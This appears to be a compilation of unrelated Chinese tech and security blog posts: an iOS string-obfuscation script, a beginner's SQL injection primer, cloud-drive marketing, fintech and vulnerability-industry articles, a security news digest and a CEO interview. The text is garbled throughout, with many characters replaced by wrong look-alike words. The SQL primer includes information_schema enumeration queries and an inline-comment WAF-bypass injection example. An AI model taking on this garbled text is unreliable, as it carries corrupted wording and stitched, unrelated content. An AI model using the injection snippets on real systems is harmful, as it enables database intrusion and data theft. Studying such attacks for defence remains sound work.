re.sub(r'(confusion_NSSTRING\(|confusion_CSTRING\()\(\(char \[\]\) \{(.*?)\}\)(\))', replace, code) code = re.sub(r'[/]*#define ggh_confusion', '//#define ggh_confusion', code) with open(file, 'w') as f: f.write(code) f.close()#读取源码门路下的所有.h和.m 文件def openSrcFile(path): print("解密门路： "+ path) # this folder is custom for parent,dirnames,filenames in os.walk(path): #case 1: # for dirname in dirnames: # print((" parent folder is:" + parent).encode('utf-8')) # print((" dirname is:" + dirname).encode('utf-8')) #case 2 for filename in filenames: extendedName = os.path.splitext(os.path.join(parent,filename)) #读取所有.h和.m 的源文件 if (extendedName[1] == '.h' or extendedName[1] == '.m'): print("已解密文件:"+ os.path.join(parent,filename)) obfuscate(os.path.join(parent,filename))#源码门路srcPath = '../daimahunxiao'if __name__ == '__main__': print("字符串解混同脚本，将被标记过的char数组转为字符串，并和0xAA异或。还原代码") if len(srcPath) > 0: openSrcFile(srcPath) else: print("请输出正确的源代码门路！") sys.exit()步骤5依据本人的需要批改下脚本外面的代码 和 文件门路。步骤6把步骤1中的宏heyujia_confusion正文了，而后执行加密脚本，在终端中输出python confusion.py, （1.如果报错，请查看下本人Mac电脑中的python版本，如果是python3就输出python3 confusion.py. （2.如果报Non-ASCII character '\xe8' in file confusion.py on line 2相干的错，请确定脚本的后面3行是#!/usr/bin/env python# encoding=utf8# -*- coding: utf-8 -*-执行完步骤6后的后果此时字符串已被加密，运行程序会发现一切正常加密后汇编界面看不见咱们的字符串内容了，然而咱们用来解密的办法还是裸露在了汇编界面，所以咱们前期还须要对办法名，变量名，类命等做混同。 ...

SQL注入背景SQL全称是“结构化查询语言( StructuredQueryLanguage)”, 它是一种介于关系代数与关系演算之间的语言,其性能包含查问、操纵、定义和管制四个方面,是一个通用的性能极强的关系数据库规范语言。 最早是IBM的圣约瑟钻研试验为其关系数据库管理系统SYSTEMR开发的一种查询语言,它的前身是SQUARE语言。 SQL语言构造简洁,功能强大,简略易学,所以自从IBM公司1981年推出以来, SQL语言失去了宽泛的利用。在SQL语言中，不须要通知SQL如何拜访数据库,只有通知SQL须要数据库做什么。 破绽介绍SQL注入（SQLInjection）是这样一种破绽：当咱们的Web app在向后盾数据库输出SQL语句进行数据库操作时。如果对用户输出的参数没有通过严格的过滤解决，那么歹意访问者就能够结构非凡的SQL语句插入或增加到利用(用户)的输出参数里，间接送到数据库引擎执行，对数据库系统的内容进行间接检索或批改。 SQL注入破绽能够说是在企业经营中会遇到的最具破坏性的破绽之一，它也是目前被利用得最多的破绽。要学会如何进攻SQL注入，咱们首先要对他的原理进行理解。 如果开发者们一个不小心，或者是编程萌新经验不足，在编写代码时没有对用户的输出数据或者是页面中所携带的信息进行必要的合法性判断，那么攻击者就会利用这个机会提交一段数据库查问代码，依据程序返回的后果，能够失去一些数据库信息。 破绽危害： 间接就造成数据库中的数据泄露。如果数据库连贯用户具备高权限，则可能导致歹意访问者获取服务器管制。泛滥安全事件的切入点。 Mysql数据库构造到了要讲外围原理的中央啦！Mysql5.0以上版本中，为了方便管理，默认定义了information_schema数据库，用来贮存数据库元信息，其中具备表schemata（数据库名）、tables（表名）、columns（列名或字段名）。而这些就是咱们进行sql注入的基石！Oops！ Schemata表中，schema_name字段用来贮存数据库名。Tables表中，table_schema和table_name别离用来存储数据库名和表名columns表中，table_schema（数据库名）、 table_name（表名）、 column_name（字段名） 性能查问语句查库select schema_name from information_schema.schemata查表select table_name from information_schema.tables where table_schema = 表名查列select column_name from information_schema.columns where table_name = 表名查数据select 库名 from 表名内置库 内置库性能mysql保留有账户信息，权限信息，存储过程，event ，时区等信息。sys蕴含了一系列的存储过程、自定义函数以及视图来帮忙咱们疾速的理解零碎的元数据信息。(元数据是对于数据的数据,如数据库名或表名，列的数据类型,或拜访权限等)performance_schema用于收集数据库服务器性能参数information_schema（咱们要用的）它提供了拜访数据库元数据的形式。其中保留着对于MySQL服务器所保护的所有其余数据库的信息。如数据库名，数据库的表，表的数据类型与拜访权限等。正文符：在mysql中常见的正文符表达式： ‘井号’...ta就和键盘上的数字3在一起 （这个在注入中用得很勤）--空格/ 行两头或多个行 /内联正文： /#! sql语句 /（只有mysql能够辨认，罕用来绕过waf）。例如失常注入：select * from articles where id = id应用内联正文注入：select * from articles where id = -1(让他报错)/*!union*//*!select*/ 1,2,3,4（这里目前超纲了哈，在后续文章中会介绍der）我想说我是一个踏上网络安全路上不久的小白，其实这些文章更像是我的学习笔记，我想把这些分享进去，作为一起致力的小白们的简略常识整顿，我是想着在迷茫的路线上如果有同行的伙伴拿着点点星光，大家多少眼里也会反射出光辉，应该会稍稍再鼓起勇气持续砥砺前行！ 那么明天就到此为止啦~次要就是整顿一下sql注入破绽的相干常识，为之后的注入打下基础，做好筹备。下一篇文章我将会整顿sql注入的流程相干常识~敬请期待哦！ 请前辈大佬们请多多关照！如果文章有任何忽略或谬误，请您斧正！蟹蟹！

因应用的的对象不同，云盘分为了企业云盘与集体云盘。网盘广泛都具备文件存储，文件共享等性能。那么集体云盘，和企业云盘的区别是什么呢？ 一、集体网盘： 集体网络磁盘的功能设计思考了一个人的存储和共享计划。 基本上所有集体网络磁盘都是公共云架构，并且常常提供收费版本，然而存储空间和传输速度受到限制，并且免费套餐通常基于工夫，存储空间和传输速度这三个范畴。 集体网络磁盘的性能特色： 通过内部链接与您意识或不意识的敌人共享文件在办公室相互增加敌人并共享对话文件将您的业务文件保留到集体网络磁盘，不便随时随地挪动办公备份重要的照片和文件。二、企业网盘 1.同步共享，合作办公室：与共事或敌人同步文件。 您能够在几个共事或敌人之间同步文件。 在其中创立或编辑文件的任何人都将主动与别人的计算机同步。 这样，同一部门或工作组能够轻松交换文件，而无需通过QQ或电子邮件手动传输文件 2.通过电子邮件发送文件：与应用传统电子邮件附件发送文件相比，此办法无需关上邮箱或上传附件，既不便又平安。 3.严格的权限管制：有四种权限：上传和下载（实用于合作办公室小组的成员），仅下载（用于公布公司公共文档），仅上传（用于收集数据，并且不心愿 拜访）并禁止拜访。 确保公司文件的安全性，避免机密信息泄露。 4.集中文件治理：管理人员将可能集中管理它们，查看和编辑员工的工作后果。 即便员工来到，他们也能够轻松地将其文件交给其他人保存，而不用放心常识空白或公司内容失落。 5.对立的文件构造：容许管理人员预约义文件存储构造（文件夹构造），并将文件构造与员工的计算机同步。 这样，员工能够将文档存储在预约义的构造中，以防止因为构造不统一而导致所收集文档的价值损失。 6.实时备份和保留历史记录：文件失落是业务经营过程中常常产生的事变，有时重要文件的失落甚至可能给公司带来灾难性的打击。 文件失落的起因有很多：存储设备（员工的计算机，U盘，CD）失落，意外删除或批改，软件和硬件故障，病毒，计算机被抢劫等。 集体云磁盘专一于集体存储。 企业云盘具备更好的数据安全性。 非组织人员通常无奈取得零碎登录地址，更不用说输出了。 同时，企业云盘也是企业和机构专用的公有云盘零碎，具备功能强大且易于应用的文档在线编辑和预览，合作办公室，部门或虚构团队级文件共享，主动打算 备份，历史数据存档等丰盛性能。

自年初暴发疫情“黑天鹅”事件以来，加大对中小微企业的反对力度，始终是我国金融零碎反对实体经济复原倒退的重要着力点。17日召开的国务院常务会议要求，进一步落实金融反对实体经济的政策措施，助力市场主体纾困倒退。 在这一背景下，科技企业积极响应金融反对政策号召，针对中小微企业融资难、慢、贵问题纷纷献计献策，以腾讯平安灵鲲推出基于联邦学习技术的金融普惠计划，致力于优化中小微企业贷款体验。 相较于大中型企业，规模小和不足抵押保障是中小微企业融资难的次要起因。据《全国工商联：2019-2020小微企业融资情况报告》数据显示，在中小企业中，44.6%的中小微经营者认为融资艰难的起因是抵押担保有余，39.8%认为是企业规模小。融资难、慢、贵无疑成中小微企业反映和呼声最为强烈的问题之一。 去年以来，国家加大对普惠金融的政策反对力度，通过定向降准、对金融机构小微企业贷款利息收入免征增值税等，从体制机制上推动了商业银行敢贷、愿贷、能贷。往年一季度，税务部门曾经向银行推送了600多万户重点帮扶的企业名单，帮助银行进行被动对接、精准放贷，升高上下游中小微企业资金压力和融资老本。 金融科技在推动普惠金融的过程中施展着重要作用，但同样也面临数据孤岛景象与数据隐衷爱护问题等诸多妨碍。针对这一问题，谷歌科学家H.Brendan McMahan早在2016年提出“联邦学习”概念。在去中心化机器学习的过程中，联邦学习可能保障每个客户的隐衷数据不出本地，从而升高了传统中心化机器学习带来的隐衷泄露危险和因数据泄露带来的相应老本。 作为国内最早提倡“联邦学习”的企业之一，腾讯平安联邦学习应用服务通过低成本疾速迭代的联结建模服务，可能在爱护所有参与方隐衷的同时，无效开释出各方大数据生产力，既满足了银行理论治理需要，又帮忙中小微企业从金融机构取得便捷高效的普惠金融服务。 与传统的联结建模相比，腾讯平安灵鲲联邦学习在数据隐衷爱护、建模效率、模型增益方面都具备显著劣势。以灵鲲与某国有银行的单干为例，在各自数据不出本地的状况下，联邦学习与通过传统形式进行联结建模的成果基本一致，具备无损性。此外在与某互金平台的单干中，联邦学习建模比客户仅用自有数据建模模型的辨别能力晋升了30%左右。 8月6日，央行颁布了北京金融科技翻新监管第二批11个试点名单，利用了腾讯平安灵鲲联邦学习的「多方数据学习“政融通”在线融资我的项目」胜利入选，成为全国首个基于联邦学习的普惠金融试点利用，助力小微企业解决资金难题，更好地助力实体经济倒退。 以后，以大数据、云计算、人工智能等前沿新兴技术与传统金融相遇，科技与金融相互浸透，业务与利用场景渐次重构，银行的数字化转型之路也在大步向前。置信在各方共同努力之下，将来中小微企业肯定可能取得更多反对、实现更好的良性倒退。

很多开发者当初越来越重视技术能力的晋升，想让本人的代码程度越来越精进，但毕竟技术的最终目标是为大家提供服务，如果服务呈现平安问题，那么技术再怎么厉害也是补救不了的，这是很多开发者会漠视的问题——平安。 明天 Gitee 为大家介绍的就是平安开发相干类的开源我的项目，蕴含了 SSO 中间件、反欺诈、代码加密等性能，一起来看看吧。 1.kisso我的项目作者： baomidou 开源许可协定： Apache-2.0 我的项目地址：https://gitee.com/baomidou/kisso 基于 Cookie 的 SSO 中间件，它是一把疾速开发 java Web 登录零碎（SSO）的瑞士军刀。 2.radar我的项目作者： radar 开源许可协定： Apache-2.0 我的项目地址：https://gitee.com/freshday/radar 一款基于java语言，应用Springboot + Mongodb + Groovy + Es等框架搭建的轻量级实时风控引擎，实用于反欺诈利用场景，极简的配置，真正做到了开箱即用。 3.HFish我的项目作者： 三斤 开源许可协定： GPL-3.0 我的项目地址：https://gitee.com/lauix/HFish HFish 是一款基于 Golang 开发的跨平台蜜罐平台，为了企业平安做出了精心的打造。 4.rsa-encrypt-body-spring-boot我的项目作者： Bobby 开源许可协定： Apacge-2.0 我的项目地址：https://gitee.com/ishuibo/rsa-encrypt-body-spring-boot Spring Boot接口加密，能够对返回值、参数值通过注解的形式主动加解密 。 5.xjar我的项目作者： 杨昌沛 开源许可协定： Apache-2.0 我的项目地址：https://gitee.com/core-lib/xjar Spring Boot JAR 平安加密运行工具，同时反对的原生JAR。 基于对JAR包内资源的加密以及拓展ClassLoader来构建的一套程序加密启动，动静解密运行的计划，防止源码泄露或反编译。 6.CAT我的项目作者： 鬼面书生 开源许可协定： MulanPSL-1.0 我的项目地址：https://gitee.com/bat/cat ...

攻击者总是在寻找新的办法来回避检测。因为大多数端点平安产品可能较好地解决基于文件的攻打，而对无文件攻打的解决能力较弱。目前在无文件攻打的案例里，基于脚本的样本比例比拟高，基于脚本、防止文件落地的攻击方式成为了攻击者绕过大多数传统平安产品的绝佳办法。 脚本可提供初始拜访权限，实现回避检测并促成感化后的横向挪动。攻击者将间接在计算机上应用脚本，或者将其嵌入到发送给受害者的电子邮件附件如Office文档和PDF中。本文概述了以后的脚本威逼状况以及最常见的脚本攻打办法。 基于脚本的攻打的衰亡 基于脚本的攻打从2017年开始变得越来越风行，Ponemon Institute公布的2020端点平安报告显示：当初基于脚本的攻打已占所有攻打的40％。值得注意的是，在横向挪动和感化中滥用非法应用程序和诸如PowerShell之类的本地工具的景象激增。 许多歹意威逼都在应用脚本。例如，下载PE文件的脚本能够将其保留到磁盘中，也能够在内存中运行，这取决于其复杂程度。该脚本还能够执行其余歹意操作，例如收集无关受害者的信息，包含计算机名称甚至保留的明码。 脚本能够是一系列简略的系统命令，也能够是用脚本语言编写的程序。常见的脚本语言有VBScript，JavaScript和PowerShell。与应用程序不同，脚本不须要编译为机器码，而是间接由计算机解释执行。用Perl脚本语言的创建者Larry Wall的话来说：“脚本是给演员的货色，而程序是给观众的货色。” 攻击者如何利用脚本？ 提到基于脚本的攻打，就不得不介绍他们经常利用的工具PowerShell。PowerShell是用于命令行治理和脚本语言的配置管理和工作自动化的框架。它提供对Microsoft Windows Management Instrumentation（WMI）和Component Object Model（COM）的拜访，利用这一工具，系统管理员能够将IT治理流程自动化。而与此同时，它也成为了攻击者在零碎中立足的无效且通用的工具。 在许多状况下，PowerShell容许攻击者侵入受害者的零碎，因为应用PowerShell可使攻击者取得他们须要的权限，在零碎中执行横向挪动，以及与其余Windows应用程序进行交互。 攻击者在攻打中应用PowerShell将恶意代码间接加载到内存中，而无需写入磁盘，从而绕过了许多端点平安产品。攻击者还能够应用PowerShell通过Metasploit或PowerSploit等框架主动执行数据窃取和感化。 与其余类型的攻打一样，在基于脚本的攻打中，攻击者通常应用网络钓鱼攻打来入侵受害者的主机，这种网络钓鱼攻打蕴含一个dropper ，例如PDF，RTF，Office文件或存档。在大多数状况下， 这个dropper 将运行一个脚本，该脚本能够是VBA宏，也能够是其余类型的脚本，例如PowerShell，JavaScript或HTA。 在某些状况下，这些脚本充当下载程序，要么将PE文件下载到磁盘之后删除，要么将PE文件注入到另一个过程，要么下载另一个脚本来执行下一阶段的攻打。极少数状况下，脚本蕴含整个歹意逻辑。另外，攻击者能够利用相似Adobe Acrobat等的文档阅读器中的破绽来进行下一阶段的攻打。无论是基于脚本的恶意软件，还是基于文件的恶意软件攻打（包含驰名的勒索软件和金融恶意软件流动），都在宽泛应用droppers。 一组攻打样本显示，有75％的无文件流动应用脚本，其中大多数是PowerShell，HTA，JavaScript，VBA中的一个或多个。 例如，总部位于伊朗的OilRig组织应用的Helminth Trojan应用脚本编写恶意代码。他们在攻打过程中，利用了Microsoft Word文档文件中编号为CVE-2017-0199的破绽  。该脚本由Windows过程执行。这一脚本会运行HTML可执行文件mshta.exe。一旦执行，脚本将启动攻打，就会将Helminth Trojan以PowerShell和VBS脚本的模式下载到本地并执行。 脚本的应用为攻击者带来了哪些益处？ 1、脚本易于编写和执行，难以了解且极其多态。此外，攻击者能够利用多种类型的脚本文件来进行攻打，其中最受欢迎的是PowerShell，JavaScript，HTA，VBA，VBS和批处理脚本。 2、因为基于脚本的无文件攻打产生在内存中，因而传统的动态文件检测变得有效。另外，脚本使预先溯源剖析变得复杂，因为许多与攻打无关的歹意脚本仅存在于计算机的内存中，并且可能通过重启零碎而被笼罩或删除。 3、基于脚本的攻打简直能够在所有Windows零碎上运行，从而减少了潜在的攻击面和感化机会。 基于脚本的攻打的一个次要毛病是，除非通过破绽利用进行部署，否则运行脚本必须进行用户交互。例如，在大多数状况下，脚本要么作为脚本文件蕴含在须要用户操作的电子邮件中，要么作为VBA宏蕴含在要求用户启用宏的文档中。 其余基于脚本的威逼 HTML应用程序（HTA）是一个Microsoft Windows文件，用于在Internet Explorer上运行，该文件将HTML代码与Internet Explorer反对的脚本（例如VBScript或JScript）联合在一起。HTA文件通过Microsoft HTA引擎mshta.exe执行，该引擎具备本地用户的特权而不是Internet Explorer的受限特权，并且能够拜访文件系统和注册表。 歹意的HTA文件容许脚本应用本地用户特权运行计算机，从而实现下载和运行可执行文件或其余脚本。只管这被认为是一种旧的攻打伎俩，但许多基于脚本的攻打仍在持续应用HTA文件，因为这些文件能够作为附件发送，由其余脚本下载或从歹意网站重定向。 VBScript是Microsoft Visual Basic的脚本版，它是一种基于VBA（Visual Basic for Applications）的Microsoft脚本语言。VBS代替了VBA提供的残缺利用程序开发，提供了更间接的用法，实现系统管理员的工作自动化。与用于相似用处的PowerShell十分相似，VBScript经常出现在基于脚本的攻打中。 如何进攻基于脚本的攻打？ 基于脚本的攻打很多没有落地到磁盘，属于无文件攻打。通过应用启发式剖析和行为剖析（ the use of heuristics and behavioral analysis），从而进行内存检测和相干行为的收集剖析，能够达到检测、进攻脚本攻打的目标。咱们之前也写过如何防护无文件攻打的文章，感兴趣的同学欢送来学习~ 相干浏览： 揭秘安芯神甲智能内存保护零碎为何能轻松防护无文件攻打 参考链接： https://www.helpnetsecurity.c...

近日，国外出名平安钻研机构Check Point发现，高通骁龙系列芯片的数字信号处理芯片（DSP）中存在大量破绽，总数多达400多。钻研人员示意，因为易受攻击的DSP芯片“简直见于世界上所有的安卓手机上”，导致寰球受此破绽影响的机型超过40%，其中不乏有寰球知名品牌手机。 报告中指出，攻击者利用这些破绽不仅能够将手机变成一个完满的监听工具，而且还可能使手机继续无响应，或者锁定手机上的所有信息，使用户永远不可拜访。此外，攻击者还能够利用恶意软件和其余恶意代码齐全暗藏歹意流动。 目前，高通已发表声明确认这些破绽的存在并公布了修复程序，倡议用户仅从受信赖的地位装置利用。但思考到受这些破绽影响的设施数量和安卓机更新速度，该补丁在短时间内很难轻松地达到所有设施，这意味着平安问题仍会呈现。 平安盲区：系统漏洞下的“人为破绽”在高通DSP芯片被曝破绽引起各方关注之时，大家甚至用“特务工具”、“史诗级破绽”、“致命隐患”等词论述被曝事件的严重性，强调的是系统漏洞平安“卡脖子”的问题。在这背地，其实有一个围绕安全漏洞的开掘、披露和利用倒退成日益凋敝、高度组织性的宏大公开市场。 如很多事物一样，景色的背地都有另一面，软件系统同样如此。各种类型的软件系统为用户带来便当和进步生产率的同时，因为信息系统从设计、开发、测试、部署和利用中存在软弱点或缺点，使得破绽具备普遍性和长期性，并且贯通软件的全生命周期。 但事实上，破绽自身并不会造成危害，可所有的平安威逼却都是出于破绽的被利用。鉴于极大的经济利益诉求，攻击者往往会在未经受权的状况下，利用这些破绽拜访网络，窃取数据或操控数据，以及瘫痪网络的性能，从而获取经济利益和隐衷数据。 安全漏洞已成为重大信息安全事件的次要起因之一，频发的安全漏洞事件更是让寰球关注达到了空前的高度。2017年5月12日，不法分子利用Windows零碎“永恒之蓝”破绽制作WannaCry勒索病毒迅速在寰球范畴内大规模暴发，至多150个国家、30万名用户中招，间接造成损失达80亿美元。往年3月，万豪连锁酒店披露了一起安全漏洞，影响了520多万酒店客人的数据，波及集体具体隐衷信息。 最近几年，被曝破绽数量逐步攀升并且一直刷新记录。依据Skybox Security最新公布的2020年破绽和威逼趋势报告显示，截至目前2020年为9799份，2019年为7318份，增幅为34%。此数据也超过了2018年前六个月报告的最高记录8485份，表明2020年的新增破绽数量很可能会冲破新记录。而据腾讯平安威逼情报中心数据显示，截至2019年12月底，仍有79%的企业终端上存在至多一个高危破绽未修复，而这带来的网络安全危险显而易见。 联动协同推动，打造破绽产业链实际闭环在破绽市场的内外双重刺激下，包含位于前端的厂商、上游破绽发现、中游破绽披露以及上游破绽利用等破绽产业化链条逐步造成，以此达到进攻黑客攻击的目标。 作为破绽产业的外围枢纽，以政府破绽库为代表的破绽平台施展着微小的价值，是掂量破绽危险水平的重要规范。在我国，由国家计算机网络应急技术解决协调核心（CNCERT）联合国内重要信息系统单位、根底电信运营商、网络安全厂商、软件厂商和互联网企业建设的国家网络安全破绽库，进行对立收集验证、预警公布及应急处理体系，切实晋升在安全漏洞方面的整体钻研程度和及时预防能力。 软件产业是软件破绽产业的源头，如何在后期疾速辨认和修补破绽就显得尤为重要。目前，国内外各大平安厂商、白帽黑客、以及钻研/测评机构在破绽开掘及进攻方面奉献了不小的力量。作为互联网安全当先品牌，腾讯平安早在2016年就已成立了七大联结实验室，专一破绽开掘并负责向第三方厂商报告，同时向用户提供破绽修复解决方案。 在帮助厂商修复破绽方面，腾讯平安联结实验室目前在破绽开掘、检测及进攻等重要环节中造成一套欠缺的破绽进攻体系。在遵循国内破绽披露规定前提下，联结实验室第一工夫向受影响厂商提交了破绽相干状况阐明，帮助受此影响厂商进一步晋升产品的平安性能，爱护宽广用户的网络安全。同时，腾讯平安联结实验室还连同腾讯其余业务平台，长年向Adobe、苹果、微软、谷歌等国内厂商提交破绽钻研报告，继续推动互联网安全生态的倒退。 在腾讯平安联结实验室之中，被业内誉为“破绽挖掘机”的腾讯平安玄武实验室曾先后对外颁布“BadBarcode”、“BadTunnel”、“利用克隆”、“残迹重用”、“BucketShock”、 “BadPower”等重要研究成果，发现并帮助国内外知名企业修复了上千个平安问题。在智能网联汽车平安钻研上，腾讯平安科恩实验室曾荣获特斯拉CEO埃隆·马斯克写亲笔信致谢、入选“特斯拉平安研究员名人堂”、寰球首个“宝马团体数字化及IT研发技术奖”等荣誉。随着以后产业互联网时代的到来，护航产业数字化改革、守护全网用户的信息安全也已成为腾讯平安联结实验室的重要使命之一。 随着互联网的疾速倒退，破绽提交平台和破绽处分打算也应运而生。现在破绽处分打算已成为寰球互联网公司的重要安全策略之一。在过来的一年，微软破费 1370 万美元处分产品破绽发现者，比上一年度同期的 440 万美元多出逾两倍。在2019年黑帽大会上，苹果降级破绽悬赏打算从之前的每个破绽 20 万美元晋升至 100 万美元，心愿借助白帽黑客力量解决本身产品安全隐患。 此外，每年寰球范畴内还会举办各种黑客大会和破绽挑战赛，围绕信息安全畛域的发展趋势、翻新技术及危险破绽进行深入探讨，集黑客最强大脑助推网络安全的倒退。随着新基建时代的到来，新基建下的平安变得前所未有的重要。本月初，国内首个新基建平安大赛正式启动，指标就是邀请行业技术精英，独特摸索新基建场景利用中潜在的平安危险，将最终赛果反哺新基建平安规范制订。 以后，以人工智能、云计算、区块链等为代表的新技术基础设施将进一步融入数字社会，破绽产业或将面临全新挑战的同时，必然也会保持高速倒退，置信将来破绽产业链也将涌现更多的业务模式和服务状态，来助力产业互联网时代平安建设。

想到办公，往往想的是坐在办公室或者在咖啡厅，拿着电脑矜矜业业的敲打着电脑键盘。但往往总会有突发性的紧急情况须要解决，电脑不在身边，无奈办公。或者重要的数据没有随身携带，无奈及时回复，导致工作不能及时实现。 1.企业云盘大大提高了工作效率 在理论的办公过程中，须要存储和编辑各种数据和文件。  Yotta 企业云盘能够帮忙公司进步工作效率并集中管理公司数据和文件。 各个部门能够共享信息时，能够协调多个部门，在线交换并疾速收集数据，从而大大提高了工作效率。 2.电子文件治理 当对各种数据资料进行集中管理时，能够生成电子模型以实现灵便的治理。 在此过程中，公司还能够防止某些危险并爱护数据和文件的安全性。 将企业云盘用于办公室能够帮忙企业疾速数字化数据文件并进步管理效率。 3.确保企业数据安全 在应用云盘的过程中，企业非常重视安全性和机密性。  Yotta 企业云盘应用区块链作为根底技术。 区块链的高冗余存储，高安全性和隐衷爱护特地适宜于存储和爱护重要数据。 同时，Yotta 企业云盘具备Truprivacy数据加密专利。 甚至云管理员也无奈获取公司数据。 同时，它反对主动备份，水印爱护，意外删除，身份验证等性能，以爱护公司数据的平安并护送公司数字资产。 4.随时随地办公 挪动互联网已逐步进入工业互联网时代。 当疫情逐步恶化时，企业开始复原工作，因为疫情而互联网经济持续疾速倒退，公司办公室也开始向智能化转型。 挪动办公是新兴的互联网。 办公模式。  Yotta 企业云盘反对多种拜访办法，例如窗口端，网页拜访，Android端，IOS端和Outlook插件。 在不同状况下应用不同的终端能够随时拜访文档，并能够随时与共事和客户进行合作。 Yotta云盘实现了智能化办公，手机，平板，都能文件编辑，查看数据文件。大大提高了办公效率。

网络安全作为国家平安的重要组成，咱们应该居安思危。 2020年数据泄露老本报告显示寰球数据泄露总成本均匀为386万美元。爱护企业外围数据安全，须要企业对最新的攻打局势有及时认知。随着攻防反抗的倒退，基于内存的攻打办法越来越多，有62%的攻打事件是攻击者采纳各种伎俩包含AI来潜入受害者的零碎。 攻击者在一直优化其攻打门路，企业在应答高级威逼也须要新的思路，常备不懈。安芯网盾致力于帮忙用户实时进攻并终止在业务要害应用程序中的无文件攻打、0day攻打和基于内存的攻打。 1、微软8月份修补120个破绽，其中蕴含2个已被利用的0day破绽。 （8.13） 8月，微软公司推出August 2020 Patch Tuesday安全补丁更新，修复了从Edge到Windows以及从SQL Server到.NET Framework的13种不同产品的120个破绽。其中有17个破绽的最高重大等级为“重大”，两个0day破绽。微软的两个0day破绽别离是：第一个是编号为CVE-2020-1464的签名认证的Windows坑骗破绽，Windows 10、8.1、7以及Windows Server都受影响。这个安全漏洞能够使攻击者绕过那些专为避免加载未被正确签名的文件而设的安全措施。第二个破绽则是与IE无关，编号为CVE-2020-1380的近程代码执行破绽是一个脚本引擎内存损坏的问题，攻击者得手后能够马上取得与以后用户雷同的用户权限。 2、TeamViewer曝破绽，计算机浏览特定网页即可被无明码入侵。 （8.9） TeamViewer官网公布音讯示意最近修补了一个高风险破绽，破绽编号：CVE 2020-13699。TeamViewer是德国TeamViewer公司的一套用于近程管制、桌面共享和文件传输的软件，该破绽影响TeamViewer基于Windows平台的TeamViewer 15.8.3之前版本，该破绽源于程序无奈正确援用其自定义URI处理程序。攻击者可借助特制参数利用该破绽启动TeamViewer。 3、美国国家安全局（NSA）和联邦调查局（FBI）公布联结报告，示意俄罗斯黑客组织应用了Drovorub恶意软件。 （8.14） 美国国家安全局（NSA）和联邦调查局（FBI）公布联结报告，示意俄罗斯黑客组织在应用一种以前鲜为人知的Linux恶意软件机密潜入到敏感网络，窃取机密信息并执行歹意命令。该变种旨在针对Linux零碎，从而在指标网络中创立了后门以窃取数据。 往期回顾 内存平安周报04｜明察秋毫，有恃无恐) 内存平安周报05｜防微杜渐，所向无敌) 内存平安周报06｜防患未然，绸缪桑土) 安芯网盾（北京）科技有限公司（简称安芯网盾）是专一于内存平安的高新技术企业，致力于为政府、金融、运营商、军工、教育、医疗、互联网及大型企业等行业客户提供面向未来的网络安全解决方案。安芯网盾领有赶超国内的智能内存保护技术，外围团队成员自2005年就专一于信息安全攻防反抗产品的研发并斩获多项国内大奖，被评为具备发展潜力和行业价值的网络安全新创企业。 安芯网盾帮忙企业构建基于硬件虚拟化技术的内存平安环境，进攻并终止在业务要害应用程序中的无文件攻打、0day破绽攻打等高级威逼，切实有效保障用户的外围业务不被阻断，保障用户的外围数据不被窃取，已为华为、Google、工商银行、瑞斯康达、OPSWAT、费尔等泛滥国内出名企事业单位继续提供服务。

守业就像在隧道中穿行，咱们的指标是隧道止境的光。然而守业的过程中会面对很多引诱，有时候近距离的灯光会遮挡或让人疏忽隧道止境的光洁。一个平凡的公司，创立的初心该当是通往隧道止境的光洁，向着这个久远的方向去打造有价值的产品，为社会发明价值，同时也能在这个过程中失去精力的回报。 ——安芯网盾CEO姜向前安芯网盾作为内存平安畛域的开拓者和创新者，十年磨一剑，凭借实力取得2020年度平安创客汇总决赛冠军，取得奇安投资2000万的投资动向，现场沸点资本追加2000万的投资动向，成为该项较量历史上第一家被现场追投的企业。2020年8月13日，安芯网盾CEO姜向前受邀加入BCS会客厅，以下为演讲实录。 谈内存平安主持人：首先祝贺安芯网盾取得了本年度平安创客汇的总决赛冠军，安芯网盾作为总冠军取得了主办方的2000万元投资动向，我据说现场沸点投资还追加了2000万，成为这项较量历史上第一家取得现场的追投的公司，请问是不是因为内存平安这一方面有什么独到的技术或者说秘诀呢？ 姜向前:说到独到的技术，我置信每一个守业公司都是有一些翻新的技术的。当初寰球做内存平安的公司一共有四家，安芯网盾是中国的第一家也是惟一一家。 提到内存保护，我首先要跟大家分享两组数据。 第一组是微软平安工程师马特·米勒在2019年以色列平安大会上示意，微软旗下的产品在过来12年修复的所有破绽中，有七成是内存平安问题。第二组数据来自谷歌，谷歌在往年的5月份把它从2015年到当初的代码库做了一个审计，发现修复级别为 "high" 或 "critical" 的912个平安谬误，其中超过70%也是内存平安问题。 所谓的高级威逼，就是单次给企业带来的危害超过500万美金以上。像去年某一个出名的比特币交易所一次性被转走7000个比特币，价值5亿以上，相似事件曾经不少见了。很多传统的解决方案是通过在零碎层或者是应用层挂钩子来采集一些信息，包含比方采集CPU的占用率、一些过程线程，把这些所有的信息采集完之后再做剖析和判断，去拦挡未知威逼。其实在我的了解里，它就像上个世纪的雷达去检测最新一代的隐形战斗机，是远远不够的。针对内存的攻打，咱们的观点是必须在内存，在CPU指令集和寄存器这个层面去做防护策略。所以咱们想到了要做一款基于CPU指令集的检测产品，于是开发了内存保护零碎。 主持人：内存是咱们十分相熟的一个名词，但说到内存平安鲜有厂商去做尝试，这是为什么呢？ 姜向前：做内存保护实际上是十分有挑战性的，攻击者比之前更弱小，他熟练地采纳了很多底层的技术，甚至是一些基于硬件的破绽和威逼。所以做内存保护须要两拨专家组合在一起，一部分是平安专家，另一部分就是零碎专家。咱们联想到的零碎专家都会在哪？在微软，在Oracle、英特尔、高通。平安专家在哪？在启明星辰、绿盟等这些平安公司，包含海内的McAfee这样的公司。而内存平安技术，同时须要零碎专家和平安专家。咱们要打造一个做内存保护的外围产品，必须有顶级的人才来反对，比方咱们的CTO姚纪卫，也就是PCHunter的作者，他就同时是一名顶级的内核专家也是一名平安专家。咱们十分渴望人才，在招聘过程中也十分严格，丑陋的履历不是咱们考验的关键点，手握实力的人才才是咱们须要的。 主持人：在整个纵深进攻体系中，内存平安属于哪一个层面呢？ 姜向前:这是一个很好的问题。咱们认为内存平安属于纵深进攻体系的最初一道平安防线。 当初的攻击者比之前更加弱小了，咱们剖析有以下三个方面的变动： 第一个方面的变动，是当初的攻击者都是组织化作战，以前都讲黑客或者小黑，黑个网站或者盗个网络账号，单兵作战居多，当初的攻击者比方APT组织，他们有生产者和运营者，是体系化作战； 